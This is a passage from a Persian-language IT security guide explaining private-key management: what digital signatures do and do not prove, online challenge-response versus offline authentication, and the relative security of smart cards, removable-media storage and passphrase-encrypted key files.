‫ﻛﻨﺘﺮﻝ ﻭ ﻣﺪﻳﺮﻳﺖ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﻓﺮﺩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ ،‬ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﻣﻲﺍﻓﺘﺪ ﺩﻗﻴﻘﹰﺎ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﻧﻴﺴﺖ‪ .‬ﻗﺎﺩﺭ ﺑﻮﺩﻥ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬
‫ﺍﻣﻀﺎﻱ ﻣﻌﺘﺒﺮ ﺍﺛﺒﺎﺕ ﻧﻤﻲﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﻳﻚ ﺷﺨﺺ ﺧﺎﺹ ﻫﺴﺘﻴﺪ‪ ،‬ﺑﻠﻜﻪ ﺗﻨﻬﺎ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧـﺎﺹ ﺩﺭ ﻣﺎﻟﻜﻴـﺖ‬
‫ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﻲﺗﻮﺍﻥ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻣﺮﺑﻮﻁ ﺑـﻪ "ﻫـﻴﻼﺭﻱ ﻛﻠﻴﻨﺘـﻮﻥ" ﻭ "‪ "Batman‬ﺭﺍ‬
‫ﻧﻴﺰ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺗﺒﺪﻳﻞ ﺑﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﻮﺩ ﭼﻨﺪﻳﻦ ﭘﻴﺶ ﺷﺮﻁ ﺑﺎﻳﺪ ﺑﺮﺁﻭﺭﺩﻩ ﮔﺮﺩﺩ‪:‬‬
‫‪ .١‬ﻫﺮ ﺟﻔﺖ ﻛﻠﻴﺪ ﻋﻮﻣﻲ‪ /‬ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﺑﻮﺳﻴﻠﺔ ﻳﻜﻨﻔﺮ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫‪130 Realtime‬‬
‫‪131 Challenge Data‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﻫﻢ ﺑـﺼﻮﺭﺕ ‪ online‬ﻭ ﻫـﻢ ﺑـﺼﻮﺭﺕ ‪ offline‬ﺑﻜـﺎﺭ ﺭﻭﺩ‪ .‬ﺩﺭ ﺣﺎﻟـﺖ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﺑﺼﻮﺭﺕ ‪ ،offline‬ﻛﺎﺭﺑﺮ ﻳﻚ ﭘﻴﺎﻡ ﺍﻣﻀﺎﺷﺪﺓ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺻﺤﺖ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺁﻳﻨﺪﻩ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻮﺩ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ‪ ،online‬ﻛﺎﺭﺑﺮ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ‪ ١٣٠‬ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﺷﻮﺩ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﻳـﻚ‬
‫ﺩﺍﺩﺓ ﻣﺒﺎﺣﺜﻪ‪ ١٣١‬ﮐﻪ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﺍﻳﺠﺎﺩﺷﺪﻩ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮ ﺁﻧـﺮﺍ ﺑـﺼﻮﺭﺕ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻣﻀﺎ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﺪ‪ ،‬ﻭ ﻳﺎ ﺩﺭ ﻳـﻚ ﺭﻭﺵ ﺩﻳﮕـﺮ‪ ،‬ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺑـﺎ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ﻛـﺎﺭﺑﺮ ﺩﺍﺩﺓ ﻣﺒﺎﺣﺜـﻪ ﺭﺍ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﺩﺍﺩﺓ ﻣﺒﺎﺣﺜﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ ﺍﺭﺳﺎﻝ ﻣﻲﻧﻤﺎﻳﺪ‪ ،‬ﻛـﻪ ﺑـﺎ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﻭ ﺑـﺎﺯﭘﺲ ﻓﺮﺳـﺘﺎﺩﻥ ﺁﻥ ﺑـﺼﻮﺭﺕ‬
‫ﺭﻣﺰﺷﺪﻩ ﺑﺎ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻮﻳﺖ ﺍﻭ ﺭﺍ ﺑﻪ ﺍﺛﺒﺎﺕ ﻣﻲﺭﺳـﺎﻧﺪ‪ .‬ﺑـﺪﻟﻴﻞ ﭘﺮﻭﺗﻜـﻞ ﻣﺒﺎﺣﺜـﻪ ‪ -‬ﭘﺎﺳـﺦ‪ ،‬ﺑﻄـﻮﺭ ﻛﻠـﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫‪ online‬ﻧﺴﺒﺖ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ offline‬ﺍﺯ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ‪.‬‬
‫‪٣١٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪.٢‬‬
‫ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ‪ .‬ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﺩﻳﮕﺮﺍﻥ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‪ ،‬ﺩﺯﺩﻱ‪ ،‬ﻭ‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﺑﻪ ﻳﻚ ﻣﻜﺎﻧﻴﺰﻡ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺎﺯ ﺍﺳﺖ‪ ،‬ﻛﻪ ﺷﺨﺼﻲ ﻛﻪ ﻫﻮﻳﺖ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﺪ ﺑﺘﻮﺍﻧﺪ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ ﻛﻪ ﻧﺎﻡ ﺭﻭﻱ ﻛﻠﻴﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﻧﺎﻡ‬
‫ﺻﺤﻴﺢ ﺻﺎﺣﺐ ﻓﻌﻠﻲ ﺁﻥ ﻛﻠﻴﺪ ﺍﺳﺖ‪.‬‬
‫‪.٣‬‬
‫ﺍﮔﺮ ﻛﻠﻴﺪﻫﺎ ﺑﺪﻭﻥ ﺩﻗﺖ ﺍﻳﺠﺎﺩ ﺷﻮﻧﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﺘﻨﺎﻇﺮ ﻣﺤﺎﺳـﺒﻪ ﻛﻨـﺪ‪ .‬ﭼﻨﺎﻧﭽـﻪ‬
‫ﻛﻠﻴﺪﻫﺎ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﺫﺧﻴﺮﻩ ﻧﺸﻮﻧﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺪﺯﺩﺩ‪.‬‬
‫ﻻ‬
‫ﻫﺮﭼﻨﺪ ﺩﺭ ﻳﻚ ﻧﮕﺎﻩ ﺳﻄﺤﻲ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺩﻩ ﺑﻨﻈﺮ ﻣﻲﺭﺳﻨﺪ‪ ،‬ﺍﻣﺎ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺻﺤﻴﺢ ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﺍﺯ ﺍﻳﻦ ﺑﺪﺗﺮ ﺍﻳﻨﻜﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﺷﺮﻛﺖ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﺮﺩ ﻭ ﺗﺸﺨﻴﺺ ﺩﺍﺩ ﻛﻪ ﺍﺯ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺩﻳﮕـﺮ ﺍﻣـﻦﺗـﺮ ﻫـﺴﺖ ﻳـﺎ‬
‫ﻧﻴﺴﺖ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻭ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪﻫﺎ ﭼﻨﺪ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﺭﺍﻫﻬﺎ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺘﺮﺗﻴﺐ ﻛﺎﻫﺶ ﺍﻳﻤﻨﻲ ﺍﺯ ﻗﺮﺍﺭ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬
‫‪.١‬‬
‫ﻳﻚ ﻛﻤﻚﭘﺮﺩﺍﺯﻧﺪﺓ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﺜﻞ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺑﻜـﺎﺭ ﺑﺮﻳـﺪ‪ .‬ﻳـﻚ ﻛـﺎﺭﺕ ﻫﻮﺷـﻤﻨﺪ ﺳـﺎﺯﮔﺎﺭ ﺑـﺎ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ‪ ،‬ﺩﺍﺭﺍﻱ ﻳـﻚ‬
‫ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ‪ ،‬ﻳﻚ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪﺓ ﺍﻋﺪﺍﺩ ﺗﺼﺎﺩﻓﻲ‪ ،‬ﻭ ﺗﻮﺍﺑﻊ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺍﻭﻟﻴﺔ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳـﺖ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ‬
‫ﻳﻚ ﺣﺎﻓﻈﻪ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻠﻴﺪﻫﺎ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﺪ‪ .‬ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﻫﻴﭽﮕـﺎﻩ ﺍﺯ‬
‫ﻛﺎﺭﺕ ﺧﺎﺭﺝ ﻧﻤﻲﺷﻮﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺨﺸﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻣﻀﺎ ﻳﺎ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ‪ ،‬ﺁﻥ ﺑﺨﺶ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳـﺪ ﺑـﻪ ﻛـﺎﺭﺕ‬
‫ﻣﻨﺘﻘﻞ ﺷﻮﺩ‪ ،‬ﻭ ﺳﭙﺲ ﺟﻮﺍﺏ ﺍﻣﻀﺎ ﺷﺪﻩ ﻳﺎ ﺭﻣﺰﮔﺸﺎﻳﻲﺷﺪﻩ ﺍﺯ ﺭﻭﻱ ﻛﺎﺭﺕ ﻣﻨﺘﻘﻞ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﻛﻠﻴـﺪ‬
‫ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﮕﺮ ﺁﻧﻜﻪ ﺧﻮﺩﺷﺎﻥ ﻣﺎﻟﻜﻴﺖ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪ .‬ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﮐﺪﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ‪ ،‬ﮔﻴﺮﻧـﺪﻩﻫـﺎﻱ‬
‫ﺍﺛﺮ ﺍﻧﮕﺸﺖ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ ﺗـﺎ ﻛـﺎﺭﺕ ﺗﻨﻬـﺎ ﺩﺭﺻـﻮﺭﺗﻲ‬
‫ﺍﻣﻀﺎ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﻛﻪ ﺩﺍﺭﻧﺪﺓ ﻛﺎﺭﺕ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺭﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﻼ ﺷﻜﺴﺖﭘﺬﻳﺮ ﻣـﻲﺑﺎﺷـﻨﺪ‪ .‬ﺍﮔـﺮ ﻛـﺎﺭﺕ ﮔـﻢ ﺷـﻮﺩ‪،‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴﺴﺘﻨﺪ ﻭ ﺍﺯ ﺑﻌﻀﻲ ﺟﻬﺎﺕ ﻛﺎﻣ ﹰ‬
‫ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ‪ ،‬ﻭ ﻳﺎ ﺁﺳﻴﺐ ﺑﺒﻴﻨﺪ‪ ،‬ﻛﻠﻴﺪﻫﺎﻱ ﺭﻭﻱ ﺁﻥ ﺍﺯ ﺑﻴﻦ ﻣﻲﺭﻭﻧﺪ ﻭ ﺩﻳﮕﺮ ﺩﺭ ﺩﺳﺘﺮﺱ ﻛﺎﺭﺑﺮ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻭﻱ‬
‫ﻛﺎﺭﺗﻬﺎ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ ﻧﻮﻋﻲ ﺳﻴﺴﺘﻢ ﻛﭙـﻲ ﻛـﺮﺩﻥ ﺍﺯ‬
‫ﺭﻭﻱ ﻛﺎﺭﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ ﺗﺎ ﺍﺯ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻥ ﻛﻠﻴﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﻛﻨـﻴﻢ‪ .‬ﻫﺮﭼﻨـﺪ ﺍﮔـﺮ ﺍﻳـﻦ ﻛﻠﻴـﺪﻫﺎ ﺗﻨﻬـﺎ ﺑـﺮﺍﻱ ﺍﻣـﻀﺎﻫﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﻧﻴﺴﺖ‪ .‬ﺍﮔﺮ ﻳﻚ ﻛﻠﻴﺪ ﺍﻣﻀﺎ ﻛﻨﻨﺪﻩ ﮔﻢ ﺷﻮﺩ‪ ،‬ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻚ ﻛﻠﻴـﺪ ﺍﻣـﻀﺎ ﻛﻨﻨـﺪﻩ ﺟﺪﻳـﺪ‬
‫ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ‪ ،‬ﻭ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻫﻴﭻ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺯ ﺑﻴﻦ ﻧﻤﻲﺭﻭﺩ‪ .‬ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺩﺭ ﻣﻘﺎﺑﻞ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻛﻮﭼﻜﻲ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ‪ :‬ﻧﻘﺎﻳﺺ ﺍﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﺯ‬
‫ﻛﻠﻴﺪ ﺷﻮﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﻳﻚ ﻛﺎﺭﺕ ﺭﺍ ﺗﺤﻠﻴﻞ ﻛﺮﺩ ﻭ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻭﻱ ﺁﻧـﺮﺍ ﺑﺎﺯﻳـﺎﺑﻲ ﻧﻤـﻮﺩ‪ .‬ﺩﺭ ﻫـﺮ ﺻـﻮﺭﺕ‬
‫ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻤﻦﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ‪.‬‬
‫‪.٢‬‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺭﻭﻣﻴﺰﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻳﺎ ‪ Flash‬ﺫﺧﻴﺮﻩ ﻛﻨﻴﺪ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ‬
‫ﻛﻠﻴﺪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ‪ ،‬ﻛﺎﺭﺑﺮ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﺭﺍ ﻭﺍﺭﺩ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﺭﺍﻳﺎﻧﻪ ﻣﻲﻛﻨﺪ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺩﺭ ﺣﺎﻓﻈﻪ‬
‫ﻣﻲﺧﻮﺍﻧﺪ‪ ،‬ﻛﻠﻴﺪ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﺍﺯ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺧﻮﺍﺳﺖﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻦ ﺗﻜﻨﻴـﻚ‬
‫ﻧﺴﺒﺖ ﺑﻪ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺍﺯ ﺍﻳﻤﻨﻲ ﻛﻤﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﺩﺭ ﺁﻥ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﻪ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﻣﻨﺘﻘﻞ ﺷـﻮﺩ‪ ،‬ﺟـﺎﻳﻲ‬
‫ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻣﻮﺭﺩ ﺣﻤﻠﺔ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺗﺮﺍﻭﺍﻫﺎ‪ ،‬ﻭ ﻳﺎ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫‪.٣‬‬
‫ﻛﻠﻴﺪ ﺭﺍ ﺩﺍﺧﻞ ﺭﺍﻳﺎﻧﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ‪ ١٣٢‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭ ﻳﻚ ﻓﺎﻳـﻞ ﺭﻭﻱ ﺩﻳـﺴﻚ‬
‫ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺳﺎﺯﻳﺪ‪ .‬ﺍﻳﻦ ﺗﻜﻨﻴﻜﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻣﺜـﻞ ‪ PGP‬ﻭ‪ Netscape Navigator‬ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ‬
‫‪132 Pass Phrase‬‬
‫‪٣١٩‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻫﺮﭼﻨﺪ ﺗﮑﻨﻴﮏ ﻣﻨﺎﺳﺒﻲ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺍﺷﻜﺎﻝ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ ﺷﻤﺎ ﺭﺍ ﺑﺪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺷﻤﺎ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﭼﻮﻥ ﻛﻠﻴـﺪ ﺑـﺮﺍﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﺩ‪ ،‬ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺕ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﻳﺎ ﺗﺮﺍﻭﺍﻫﺎ ﺑﻪ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ‪.‬‬
‫‪.۴‬‬
